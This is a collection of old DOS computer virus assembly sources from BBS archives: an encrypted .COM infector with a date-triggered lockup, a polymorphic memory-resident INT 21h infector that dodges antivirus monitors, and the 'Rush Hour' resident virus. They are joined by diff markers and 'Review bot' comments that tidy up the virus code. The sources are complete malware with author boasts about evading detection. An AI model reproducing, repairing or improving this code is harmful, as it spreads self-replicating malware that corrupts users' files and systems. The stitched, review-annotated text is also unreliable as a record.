; "If a weaking linkage found, eliminate...
; Hear the cities fearfull roar!"
;
; Now in front of you lies another source of a virus. It is not a very good
; one, but, as you might say, a virus is a virus. After my wake at the PC, I
; created several viruses, like:
;
; Deicide / Glenn
; Morgoth
; Breeze
; Brother
; Commentator I
; Commentator II
; Spawnie
; Xmas
; 1St_Star / 222
; T-1000
;
; Well, I bet you think this is a whole lot, but some are minor variants, for
; which I don't have the guts to publish the source code. I have to admid,
; Deicide and Morgoth have spread very well. I uploaded them to a BBS and it
; was downloaded several times, and it is not detected by antivirus program yet.
; Deicide is now detectable, but that was my first attempt to make a virus.
;
; This virus is a Non-Resident Direct Action .COM Infector.
; It only infects files in the current directory.
; You can recognize a infected file simply, the 4th byte is a '*' (just like
; the 1St_Star virus). It is inactive from January till May and starts
; replicating from May. After July, every Wednessday after the 21st the
; program will hang the system, showing the address of RTL4 Joop v/d Ende
; Productions.
;
; Disclaimer : This program is like all other virus sources only for
; educational purposes and should not be given to irresponsible hands
; (John McAfee and people like him).
;
; For the criminal reader : Don't just change the text of this virus and
; say you made a virus. Instead use some ideas from this virus and create your
; own virus if you want to be nasty. Additions to this virus that makes it
; spreading faster and makes it harder to detect are welcome, as long as I get
; the new source code.
;
; I want to thank several virus writers for their support with letting McAfee
; and Ass. earn his money with making so many updates of SCAN...
; Here they are : Bit Addict, XSTC, Dark Helmet, Dark Avenger, Nuke!, Cracker
; Jack and many more creators.
;
; Note to XSTC : Thank you for disassembling the Deicide virus, for I have lost
; the source code. Next time write a message, because I might have the source
; code of the virus ready, but not uploaded. It saves you time, so you may
; disassemble another virus (ofcourse only for educational purposes ;-) )
;
; Now have fun with this virus, written in A86 assembler version 3.22
;
; Glenn Benton
;
; "Is it truly a disembodied head lurking in the dark of the tombs of fate?"
;
Org 0h ; The outcome will be .BIN
Start: Jmp MainVir ; Jump to main virus
Db '*' ; signature
MainVir: Call On1 ; Get virus offset
On1: Pop BP ; BP is the index register
Sub BP,Offset MainVir+3 ; Calculate virus offset
Push Ax ; And store AX (error reg.)
Lea Si,Crypt[BP] ; Decryptor for the
Mov Di,Si ; virus code. It's long
Mov Cx,CryptLen ; for a decoder, but it
Decrypt: Lodsb ; reduces the recognizable
Xor Al,0 ; part enough.
Stosb ;
Loop Decrypt ;
DecrLen Equ $-MainVir ; Decryptor length
Crypt: Mov Ax,Cs:OrgPrg[BP] ; Store the 4 first bytes
Mov Bx,Cs:OrgPrg[BP]+2 ; of the host
Mov Cs:Start+100h,Ax ;
Mov Cs:Start[2]+100h,Bx ;
Mov Ah,2ah ; Get date
Int 21h ; If it is a wednessday
Cmp Dh,8 ; after July and after
Jb NoMsg ; the 21st, it will
Cmp Dl,22 ; will continue, else
Jb NoMsg ; it goes to NoMsg
Cmp Al,3 ;
Jne NoMsg ;
Mov Ah,9 ; Display the message
Lea Dx,Msg[BP] ;
Int 21h ;
Lockout: Cli ; And lock the computer
Jmp Lockout ;
NoMsg: Cmp Dh,5 ; Is it after April?
Jae DoVirus ; Yes - Replicate
Jmp Ready ; No - Terminate to host
DoVirus: Mov Ah,1ah ; Move DTA to a safe place
Mov Dx,0fc00h ; $FE00
Int 21h
Mov Ah,4eh ;
Search: Lea Dx,FileSpec[BP] ; Search for a .COM file in
Xor Cx,Cx ; the current directory
Int 21h ;
Jnc Found ; If not exist, goto Ready
Jmp Ready ; else goto Found
Found: Mov Ax,4300h ; Get file attributes
Mov Dx,0fc1eh ; and store them on the stack
Int 21h ;
Push Cx ;
Mov Ax,4301h ; Wipe the attributes, so it
Xor Cx,Cx ; is accessable for us
Int 21h ;
Mov Ax,3d02h ; Open the file with
Int 21h ; read/write priority
Mov Bx,5700h ; Get de file date/time stamp
Xchg Ax,Bx ; and store them on the stack
Int 21h ;
Push Cx ;
Push Dx ;
Mov Ah,3fh ; Read the first 4 bytes
Lea Dx,OrgPrg[BP] ; of the program
Mov Cx,4 ;
Int 21h ;
Mov Ax,Cs:[OrgPrg][BP] ; Is it a weird EXE?
Cmp Ax,'MZ' ; Yes goto ExeFile
Je ExeFile ;
Cmp Ax,'ZM' ; Is it a normal EXE?
Je ExeFile ; Yes, goto ExeFile
Mov Ah,Cs:[OrgPrg+3][BP] ; Is it already infected?
Cmp Ah,'*' ; No, goto Infect
Jne Infect ;
ExeFile: Call Close ; Call File close
Mov Ah,4fh ; Jump to the search routine
Jmp Search ; again for a .COM file
FSeek: Xor Cx,Cx ; Subroutine for jumping to
Xor Dx,Dx ; the begin/end of file
Int 21h ;
Ret ;
Infect: Mov Ax,4202h ; Jump to EOF
Call FSeek ;
Sub Ax,3 ; Calculate new virus offset
Mov Cs:CallPtr[BP]+1,Ax ;
Mov Ah,2ch ; Get system time
Int 21h ;
Mov Cs:Decrypt+2[BP],Dl ; Move the decryptor part
Lea Si,MainVir[BP] ; with the 100ds second put
Mov Di,0fd00h ; into the XOR command to
Mov Cx,DecrLen ; the end of the 64K segment
Rep Movsb ;
Lea Si,Crypt[BP] ; Encrypt the virus with
Mov Cx,CryptLen ; the 100ds seconds.
Encrypt: Lodsb ; Merge it behind the
Xor Al,Dl ; decryptor
Stosb ;
Loop Encrypt ;
Mov Ah,40h ; Write the virus
Lea Dx,0fd00h ; at the end of the
Mov Cx,VirLen ; file
Int 21h ;
Mov Ax,4200h ; Move to start of
Call FSeek ; the file
Mov Ah,40h ; Write the jump to the virus
Lea Dx,CallPtr[BP] ; at the begin of the file
Mov Cx,4 ;
Int 21h ;
Call Close ; Close the file
Ready: Mov Ah,1ah ; Restore the DTA to the
Mov Dx,80h ; original offset
Int 21h ;
Pop Ax ; Get (possible) error code
Mov Bx,100h ; Strange jump (but nice) to
Push Cs ; the begin of the program
Push Bx ; (which has been restored)
Retf ;
Close: Pop Si ; A pop which is stupid
Pop Dx ; Restore files date/time
Pop Cx ; stamp
Mov Ax,5701h ;
Int 21h ;
Mov Ah,3eh ; Close file
Int 21h ;
Mov Ax,4301h ; Restore attributes
Pop Cx ;
Mov Dx,0fc1eh ;
Int 21h ;
Push Si ; A push which is stupid
Ret ; Return to caller
CallPtr Db 0e9h,0,0 ; Jump
FileSpec Db '*.COM',0 ; Filesearch spec & signature
; Activation message
Msg Db 13,10,9,9,'RTL4'
Db 13,10,'Joop van den Ende Produkties BV'
Db 13,10,'Marco Daas (Casting Assistent)'
Db 13,10,'Postbus 397'
Db 13,10,'1430 AJ AALSMEER'
Db 13,10,'van Cleeffkade 15'
Db 13,10,'1413 BA AALSMEER'
Db 13,10,'The Netherlands'
Db 13,10,10,'Wedden dat... je een virus hebt?'
Db 13,10,'$'
; First 4 bytes of the host program
OrgPrg: Int 20h
DB 'GB' ; My initials (Glenn Benton)
CryptLen Equ $-Crypt ; Length of encrypted part
VirLen Equ $-MainVir ; Length of virus
;
; Sleep well, sleep in hell...
;
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
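Review bot: The comment beside `Mov Dx,0fc00h` under `DoVirus` reads `$FE00`, which does not match the value loaded; the DTA is placed at 0FC00h and the later `Mov Dx,0fc1eh` reads the found filename from offset 1Eh of that DTA, so the comment should read `; $FC00` or be dropped. As a point of style, `Lea Dx,0fd00h` loads a constant through LEA while the equivalent line a few instructions earlier uses `Mov Di,0fd00h`; `Mov Dx,0fd00h` is the conventional form and keeps the two consistent.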
+543
@@ -0,0 +1,543 @@
ORG 0100H ; ..
Virii label Near ; Start adress CS:0100H
;
Mutate Proc Near ; The Decryption/encryption code begin here ..
Cmp Ax,01100H ;
J_N_E: ; Adress of the byte to change
JA ByeBye ; Will change for an 'JNE'
ExitFromINT21: ;
TTT: ;
ThePush: ;
Push Si ;
TheMov: ;
Lea Si,TheBody ;
Work: ;
theXor: ;
DB 02EH,081H,034H ; XOR W[Cs:Bx], ..
Mask Dw 0 ; Decryption/Encryption Key
TheAdd: ;
Add Si,2; ;
TheCmp: ;
Cmp Si,ViriiEnd-3 ;
Jb Thexor ;
ThePop: ;
Pop Si ;
; ;
Cmp B[Cs:FromTheHandler],1 ; The handler is calling?
Jne TheBody ; No
;
ExitWithREt: ;
Mov B[Cs:FromTheHandler],0 ;
PopA ;
ByeBye: ;
DB 0EAH ; Jmp Far
OLDINT21 DD 0 ;
; ;
FromTheHandler DB 0 ; Set to 1 if INT 21h handler call
; ;
Mutate EndP ; End of the procedure
TheBody Proc Near ; This Part is encrypted With the key "Mask"
PushA ; 286 & +
Call ChangeDecryptor ;
Cmp B[Cs:InTSR],1 ; Is it an INT 21h Call ?
Jne installit ;
Jmp Near INT21handler ; Yes .. jump to the handler
installit: ; Virus installation is done here
Mov B[inTSR],1 ; Indicate that the virus is in service
Mov B[J_N_E],072H ; 'JNE'
;;;;;;;;
Mov Ax,Cs ; ----- Reserve memory Block
Dec Ax ; Point to the MCB
Mov Ds,Ax ;
Mov Cx,W[Ds:3] ; Read the Size of the memory block
Sub Cx,VirSize2 + 20 ; Memory occuped by the Virus
Mov Bx,Cx ;
Mov Ah,04Ah ;
int 021H ;
Mov Bx,-1 ;
Mov Ah,048H ;
Int 021H ;
Mov Ah,048H ;
Int 021H ;
Dec Ax ;
Mov Ds,Ax ;
Mov W[1],0008 ; Set it as DOS SYSTEM AREA (heheheh)..
;;;;;;;;;; ;
Inc Ax ;
Mov Es,Ax ; Destination Seg:Off
Mov Di,0100H ; ES:DI ==> destination
Push Cs ; Source Seg:Off
Pop Ds ; Set Ds to the current segment
Lea SI,virii ; DS:SI ==> source
Mov Cx,VirLength ;
Cld ;
Repz ;
Movsb ;
Mov W[Es:Mask],0 ;
;;;;;;;;; ;
Cli ;
Mov Ds,Cx ; Ds to 0
Mov Ax,W[Ds:084H] ; Offset of the handler
Mov W[Es:Oldint21],AX ;
Mov Bx,W[Ds:086H] ; Segment of the Handler
Mov W[Es:OldInt21+2],Bx ;
Sti ;
Push Es ;
Push Di ;
Push Si ;
Call MemoryVerifier ;
Pop Si ;
Pop Di ;
Pop Es ;
Jc AnotherDayMaybe ;
;;;;;;;;; ;
;
Cli ;
Mov W[0413H],Ax ; Set Int 21 handler
Mov Ax,0100H ;
Mov W[0084H],Ax ;
Mov Ax,Es ;
Mov W[0086h],Ax ;
Sti ;
Jmp Ok ;
;;;;;;;;;;;;;;; ; The handler is now installed
; We have to Jump Far Far ..
AnotherDayMaybe:
Mov Ah,049H
Int 021H
Ok:
; And Encrypt It with a new Key
; Jump To The virus In mem
Push Cs ; Save CS twice for later Uses
Push Cs ; Do not forget : CS represents the segment
; Of the previously infected application !
;
Push Es ;
Push JumpTHere ; Store offset and segment on the Stack
RetF ; & jump
;---- This part run in "memory"
JumpTHere: ;
DecryptEndOfFile: ; Decrypt original application code
Pop ES ; ES & DS set to the PSP segment
Pop Ds ;
Mov Di,Cs:[FileSize] ; Destination
Add Di,0100H ; PSP Size (256 bytes)
Mov Si,Di ; Source
Push Si ;
;Mov Cx,VirLength ;
;Mov Dl,B[Cs:LocalKey] ; Local File Decryption Key
;Here2: ;
;LodsB ;
;Xor Al,Dl ;
;StosB ;
;Loop Here2 ; Decrypt the File
;
CopyEndOfFile: ; Now Copy The original code
Mov Cx,VirLength ;
Pop Si ;
Mov Di,0100H ; To the begining
Cld ;
Repz Movsb ; & Blit
; The Job of the virus launcher is finished
; We can now execute the infected file ..
;RESTORE REGISTERS
Mov W[Cs:Mask],0 ; we are not encrypted in the moment
PopA
Push es
Push 0100H
RetF
;****************************** ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
;****************************** º Features: º
;** Decryptor Mutator ** º 1 .3 different encryptor/decryptor º
;** By X ** º 2 .Automatic size checking º
;** 15-3-93 ** º 3 .Expansion possibilities º
;****************************** º 4 .The smollest code º
;****************************** ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
ChangeDecryptor Proc Near
Push Ax
Push Bx
Mov Al,5
Mov Bl,B[Cs:ThePush]
Cmp Bl,053h
Je BxIsTheRegister
Cmp Bl,057H
Jne SiIsTheregister
Mov Al,4
Jmp MutateTheCode3
SiIsTheRegister:
Mov Al,1
BxIsTheRegister:
MutateTheCode3:
Xor B[Cs:ThePush],Al ; Switch To SI register
Xor B[Cs:ThePop],Al ; //
Xor B[Cs:TheMov],Al ;
Xor B[Cs:TheAdd+1],Al ;
Xor B[Cs:TheCmp+1],Al ;
Cmp Al,1 ;
Je MutationDone ;
Sub Al,2 ;
MutationDone: ;
Xor B[Cs:TheXor+2],Al ;
Pop Bx
Pop Ax
RET
;FVBM proc near ; First five bytes mutator
;PushA
;Lea Si,CodeTable ; Offset of our table
;Push Cs ;
;Push Cs ;
;Pop Ds ;
;Pop Es ;
;Add Si,B[Cs:pointer] ;
;Mov Cx,0005 ; Copy 5 bytes
;Cld ;
;RepZ MovSB ; Blit
;Add B[Cs:pointer],5 ;
;Cmp B[Cs:pointer],25 ; are we at the end of the table
;Jne Allright1 ;
;Mov B[Cs:pointer],0 ;
;Allright1: ;
;Mov Ax,02CH ; Input from the timer
;int 021H ;
;Xor Dh,Dl ;
;Mov B[Cs:Mutate+1],Ch ;
;Xor Dl,Cl ;
;Mov B[Cs:Mutate+3],Dl ;
;PopA ;
;Ret ; return to the caller
;CodeTable: ;
One1 : Mov Ah,0 ;
;; Sub Al,0 ;
; Nop ;
; ;
;Two2 : mov Ch,0 ;
; add Bl,0 ;
; Cld ;
; ;
;Three3: adc Cl,0 ;
; sub Ch,0 ;
; Stc ;
;
;Four4 : Mov Bh,0
; Mov Cl,0
; Nop
;
;CodeTableEnd:
;Pointer Db 0 ;
;
;
;******************************
;******************************
;** Resident part **
;** By X **
;******************************
;******************************
HideINT21H Proc Near ;
PopA ;
Mov Bx,W[Cs:OLDint21] ;
Mov Es,Bx ;
Mov Bx,W[Cs:Oldint21+2] ;
Iret ;
;
INT21Handler proc ;
Cmp Ax,04B00H ;
Je Exec ;
;Cmp Ax,03521H ;
;Jne NoHide ;
;Call HideINT21H ;
;NoHide: ;
;Cmp Ax,02521H ;
;Jne Nothinginterresting ;
;Call SimulateINT21H ;
Nothinginterresting: ;
Mov B[Cs:FromTheHandler],1 ;
Jmp ExitFromINT21 ;
Read: ;
Exec: ;
Mov Ax,03D02H ;
Int 021H ;
Jnc OpenSuccess ; Good ..
Jmp OpenFailed ; This operation Failed ..
OpenSuccess: ;
Mov W[Cs:Handle],Ax ;
Mov Si,Dx ; VeriFy if the file has a .COM extension
HereX: ;
Lodsb ;
Cmp al,'.' ; Searh for the Dot
Jne HereX ;
Dec Si ;
Dec Si ;
Dec Si ;
LodsW ;
Or Ax,02020H ;
Cmp Ax,'dn' ; Test For command.com
Jne NotCommand ;
Jmp ExitSimple ;
NotCommand: ;
Lodsb ;
Lodsb ;
Or Al,20H ; .
Cmp Al,'c' ; C
Je ContinueX ;
Jmp ExitSimple ;
ContinueX: ;
LodsW ;
Or Ax,02020H ; O
Cmp Ax,'mo' ; M
Je ComType ;
Jmp ExitSimple ;
ComType: ; Now for Command.COM
;;;;;;;;; ;
Push Ds ;
Push Dx ;
Mov Al,2 ; To the end
Call Seek0 ;
Pop Dx ;
Pop Ds ;
;;;;;;;;; ;
Push Ax ;
Push Cx ;
Push Dx ;
Mov Ah,02CH ;
Int 021H ;
Mov Cx,Ax ;
Xor Cx,Dx ;
Mov W[Cs:Mask],Cx ; Use file size as mutation key
Pop Dx ;
Pop Cx ;
Pop Ax ;
Mov W[Cs:FileSize],Ax ; Save File Size for the Mutation heritant
Cmp Ax,Virlength ; The file is too small?
Jnb NotSmall ;
Jmp ExitSimple ; Nop !
NotSmall: ;
Cmp Ax,64000 ; The file is too big?
Jna NotBig ;
Jmp ExitSimple ; No No
NotBig:
;;;;;;;;;
Mov Ax,04300H ;
Int 021H ;
Mov W[Cs:OldAttr],Cx ; Okey .. we have all we need
;;;;;;;;;
Mov Bx,W[Cs:Handle]
Mov Ax,04301H
Xor Cx,Cx
Int 021H
;;;;;;;;;
Push Ds ; Save For later uses (attributes)
Push Dx ;
;;;;;;;;;
Mov Ax,05700H ;
Int 021H ;
Mov W[Cs:OldTime],Cx ; Save File Time
Mov W[Cs:OldDate],Dx ; Save File date
And Cx,01FH ; Several viruses use this indicator (second=62)
Cmp Cx,01FH ;
Jne NotInfected
Jmp CloseAndExit ; Infected .. leave it alone .
NotInfected:
;;;;;;;;; ;
Xor Ax,Ax ; Seek to the Begining of the file (AL=0)
Call Seek0 ;
;;;;;;;;; ;
InfectTheFile: ; I love this part !
Mov Bx,W[Cs:Handle] ;
Mov Ah,03FH ; Read The Top of the File
Push Cs ;
Pop Ds ; To The buffer ..
Lea Dx,ViriiEnd ; The buffer is located at the end of the virus
Mov Cx,Virlength ; Number of bytes to read
Int 021H ; (ViriiEnd = virlength+0100h)
Jnc Continue6 ;
Jmp CloseAndExit ; Something is going wrong
Continue6: ;
;;;;;;;;; ;
Mov Al,2 ; Seek To the end
Call Seek0 ;
;;;;;;;;; ; Encrypt the Code
Mov Bx,W[Cs:Mask] ; get the virus Mask
Mov Ah,02CH ; Get a random Value
Int 021H ; From the timer
Xor Bx,Dx ; Good Good ...
Mov B[Cs:LocalKey],Bl ; Use This as The original code encryptor
Mov Dl,Bl
;;;;;;;;; ;
;Mov Cx,Virlength ; Encrypte the original code to make it harder
;Lea Bx,ViriiEnd ; to detect by virus scanners.
;Here4: ;
;Xor B[Cs:Bx],Dl ;
;Inc Bx ;
;Loop Here4 ;
;;;;;;;;; ;
Lea Dx,ViriiEnd ;
Push Cs ;
Pop Ds ;
Mov Bx,W[Cs:Handle] ;
Mov Cx,Virlength ;
Mov Ah,040H ; Write the code to the end
Int 021H ;
Jc CloseAndExit ; Bad ..
;;;;;;;;; ;
Xor Ax,Ax ;
Call Seek0 ; Seek to the begining of the file
;;;;;;;;; ; Copy The viral code to the peace of code
; we read
Mov B[Cs:J_N_E],077H ;
Mov B[Cs:InTSR],0 ;
Push Cs ;
Push Cs ;
Pop Ds ;
Pop Es ;
Lea Si,Mutate ; First We Blit The Mutation Engine
Lea Di,ViriiEnd ;
Mov Cx,MutatorSize ;
Cld
Repz MovsB ;
Mov Cx,BodySize2 ; And blit the body after some mutations
Mov Bx,W[Cs:Mask] ; Mouahahahah ...
Here5: ;
LodsW ;
Xor Ax,Bx ;
StosW ;
Loop Here5 ;
;;;;;;;;; ;
Mov B[Cs:J_N_E],072H ;
Mov B[Cs:InTSR],1 ; And restore the TSR Flag
Push Cs ;
Pop Ds ;
Mov Dx,offset ViriiEnd ;
Mov Bx,W[Cs:Handle] ;
Mov Cx,Virlength ;
Mov Ah,040H ; Write The Virus
Int 021H ;
; ;
CloseAndExit: ;
Mov Bx,W[Cs:Handle] ;
Mov Ax,05701H ;
Mov Cx,W[Cs:OldTime] ; Set File Time
Mov Dx,W[Cs:OldDate] ; Set File date
Int 021H ;
;
Pop Dx ;
Pop Ds ;
Mov Ax,04301H ;
Mov Cx,W[Cs:OldAttr] ; Okey .. we have all we need
Int 021H ;
ExitSimple: ;
Mov Bx,W[Cs:Handle] ;
Mov Ah,03EH ; Close The File
Int 021H ;
OpenFailed: ;
Mov B[Cs:FromTheHandler],1 ; This is the handler
Jmp ExitFromInt21 ; Give me another monstreous mutation !
;
Seek0: ;
Xor Cx,Cx ;
Seek: ;
Mov Ah,042H ; Seek to the end or to the begining of the file
Xor Dx,Dx ; Xor Dx,dx
Mov Bx,W[CS:Handle] ;
Int 021H ;
Ret ;
;******************************
;******************************
;** Memory Verifier **
;** By X **
;** 18-03-1993 **
;******************************
;******************************
MemoryVerifier Proc Near
Stc ; Set the carry Flag
Cmp Ax,0100H ; The Virus is installed At ????H:0100H
Je NoWay ; Do not take the risk
Cmp Ax,0362H ; VirStop is installed (Fprot) ..nonono
Je NoWay ;
;
Mov Ax,0FA00H ; Test for vsafe (Central Point) ..nonono
Xor Di,Di ;
Mov Dx,05945H ;
Int 013H ;
Cmp Di,04559H ;
Je NoWay ;
;
Mov Ax,0FF0FH ;
Int 021H ; VirexPc/Flushot INSTALLATION CHECK
Cmp Ax,101H ;
Je NoWay ; Never , never , never !
;
Mov Ax,04B4DH ; Murphy 2 INSTALLATION CHECK
Int 021H
jnc NoWay ; Nah !
;
Mov Ax,04B59H ; Murphy 1 INSTALLATION CHECK
Int 021H ;
Jnc NoWay ; Murphy 1 is resident
;
Mov Ax,04BFFH ; CASCADE,Justice & 707 INSTALLATION CHECK
Xor Si,Si ; Si&Di to zero for CASCADE
Xor Di,Di ;
Int 021H
Cmp Bl,0FFH
Je NoWay ; 707 is resident
;
Cmp Di,055AAH
Je NoWay ; Cascade or justice is resident
;
Mov Ax,0357FH ; AgiPlan INSTALLATION CHECK
Int 021H
Cmp Dx,0FFFFH ;
Je NoWay ; AgiPlan is installed
;
Mov Ax,04243H ; Invader INSATLLATION CHACK
Int 021H
Cmp Ax,05678H
Je NoWay ; Invader is resident
;
Clc ; Okey ..
Jmp return
Noway:
Stc
return:
Ret
MemoryVerifier EndP
DatasArea: ; For Datas storage.
SizeOfTheHole DW 0
FileSize DW FileLength ; The size of the infected File
inTSR DB 0
LocalKey DB 0
Victim_Releated_Datas:
Handle DW 0
OldAttr DW 0
OldTime DW 0
OldDate DW 0
ViriiEnd:
;Constante
VirLength EQU (ViriiEnd-Virii)
VirSize2 EQU (Virlength/16) * 2
VirSize4 EQU VirSize2 * 2
VirLength2 EQU Virlength/2
MutatorSize EQU TheBody-Mutate
BodySize EQU ViriiEnd-TheBody
BoDySize2 EQU BoDySize/2
TheCenter:
Db 300 dup (0)
TheCodePart:
Db (Virlength-5) dup (90h)
Mov Ax,04C00h
Int 021H
EndOfFile:
FileLength equ TheCodePart-virii
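Review bot: The comment on `Mov W[Cs:Mask],Cx` (`; Use file size as mutation key`) does not match the code: the key is built from the INT 21h AH=2Ch time call two lines above it (`Mov Cx,Ax` then `Xor Cx,Dx`, i.e. AX with AH=2Ch and AL=day-of-week XORed with DX=seconds:hundredths), while the file size returned by Seek0 is only stored a few lines later at `Mov W[Cs:FileSize],Ax`. For anyone using this listing as a study sample that distinction matters when documenting how the decryptor key of a given infected file was derived; suggest `; Mask = AX (AH=2Ch, AL=weekday) XOR DX (seconds:hundredths) from INT 21h/2Ch -- NOT the file size`. Likewise `Mov W[0413H],Ax ; Set Int 21 handler` is mislabelled: the INT 21h vector is written by the four instructions that follow it (0:0084h / 0:0086h), and 0:0413h is the BIOS base-memory-size word, written here with whatever AX was left holding after MemoryVerifier's last check; a comment such as `; stores AX (left over from MemoryVerifier) into BIOS memory-size word 0:0413h -- the INT 21h vector is set below` keeps the two apart. The equates after `ViriiEnd:` (VirLength, VirSize2, MutatorSize, BodySize2) are used earlier than they are defined, which is legal for a two-pass assembler but worth a one-line comment so it is not misread as an undefined symbol.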
@@ -0,0 +1,242 @@
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
page 72,132
title Virus"RUSH HOUR" (c) Hanx ,1992
name VIRUS
abso segment at 0
org 4*10h
video_int dw 2 dup (?)
org 4*21h
dos_int dw 2 dup (?)
org 4*24h
error_int dw 2 dup (?)
abso ends
code segment
assume cs:code, ds:code, es:code
org 05ch
fcb label byte
drive db ?
fspec db 11 dup (' ')
org 6ch
fsize dw 2 dup (?)
fdate dw ?
ftime dw ?
org 80h
dta dw 128 dup (?)
org 071eh
xor ax,ax
mov es,ax
assume es:abso
push cs
pop ds
mov ax,video_int
mov bx,video_int+2
mov word ptr video_vector,ax
mov word ptr video_vector+2,bx
mov ax,dos_int
mov bx,dos_int+2
mov word ptr dos_vector,ax
mov word ptr dos_vector+2,bx
cli
mov dos_int,offset virus
mov dos_int+2,cs
mov video_int,offset disease
mov video_int+2,cs
sti
mov ah,0
int 1ah
mov time_0,dx
lea dx,virus_einde
int 27h
video_vector dd (?)
dos_vector dd (?)
error_vector dw 2 dup (?)
time_0 dw ?
rndval db 'bfhg'
active db 0
preset db 0
db 'A:'
fname db 'KEYBGR COM'
db 0
virus proc far
assume cs:code, ds:nothing, es:nothing
push ax
push cx
push dx
mov ah,0
INT 1AH
SUB DX,TIME_0
CMP DX,16384
JL $3
MOV ACTIVE,1
$3: pop dx
pop cx
pop ax
cmp ax,4b00h
je $1
exit_1: jmp dos_vector
$1: push es
push bx
push ds
push dx
mov di,dx
mov drive,0
mov al,ds:[di+1]
cmp al,':'
jne $5
mov al,ds:[di]
sub al,'A'-1
mov drive,al
$5: cld
push cs
pop ds
xor ax,ax
mov es,ax
assume ds:code, es:abso
mov ax,error_int
mov bx,error_int+2
mov error_vector,ax
mov error_vector+2,bx
mov error_int,offset error
mov error_int+2,cs
push cs
pop es
assume es:code
lea dx,dta
mov ah,1ah
int 21h
mov bx,11
$2: mov al,fname-1[bx]
mov fspec-1[bx],al
dec bx
jnz $2
lea dx,fcb
mov ah,0fh
int 21h
cmp al,0
jne exit_0
mov byte ptr fcb+20h,0
mov ax,ftime
cmp ax,4800h
je exit_0
mov preset,1
mov si,100h
$4: lea di,dta
mov cx,128
rep movsb
lea dx,fcb
mov ah,15h
int 21h
cmp si,offset virus_einde
jl $4
mov fsize,offset virus_einde -100h
mov fsize+2,0
mov fdate,0AA3h
mov ftime,4800h
lea dx,fcb
mov ah,10h
int 21h
xor ax,ax
mov es,ax
assume es:abso
mov ax,error_vector
mov bx,error_vector+2
mov error_int,ax
mov error_int+2,bx
exit_0: pop dx
pop ds
pop bx
pop es
assume ds:nothing, es:nothing
mov ax,4b00h
jmp dos_vector
virus endp
error proc far
iret
error endp
disease proc far
assume ds:nothing, es:nothing
push ax
push cx
test preset,1
jz exit_2
test active,1
jz exit_2
in al,61h
and al,0feh
out 61h,al
mov cx,3
noise: mov al,rndval
xor al,rndval+3
shl al,1
shl al,1
rcl word ptr rndval,1
rcl word ptr rndval+2,1
mov ah,rndval
and ah,2
in al,61h
and al,0fdh
or al,ah
out 61h,al
loop noise
and al,0fch
or al,1
out 61h,al
exit_2: pop cx
pop ax
jmp video_vector
disease endp
db 'Dit is een demonstratie van een zogenaamd computervirus.'
db 'Het heeft volledige controle over alle systeem-componenten'
db 'en alle harde schijven en in de drive(s) ingevoerde'
db 'diskettes. Het programma kopieert zichzelf naar andere,'
db 'nog niet besmette besturingssystemen en verspreidt zich op'
db 'die manier ongecontroleerd. In dit geval zijn er geen'
db 'programma`s beschadigd of schijven gewist, omdat dit'
db 'slechts een demonstratie is. Een kwaadaardig virus'
db 'had echter wel degelijk schade aan kunnen richten.'
org 1c2ah
virus_einde label byte
code ends
end

;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
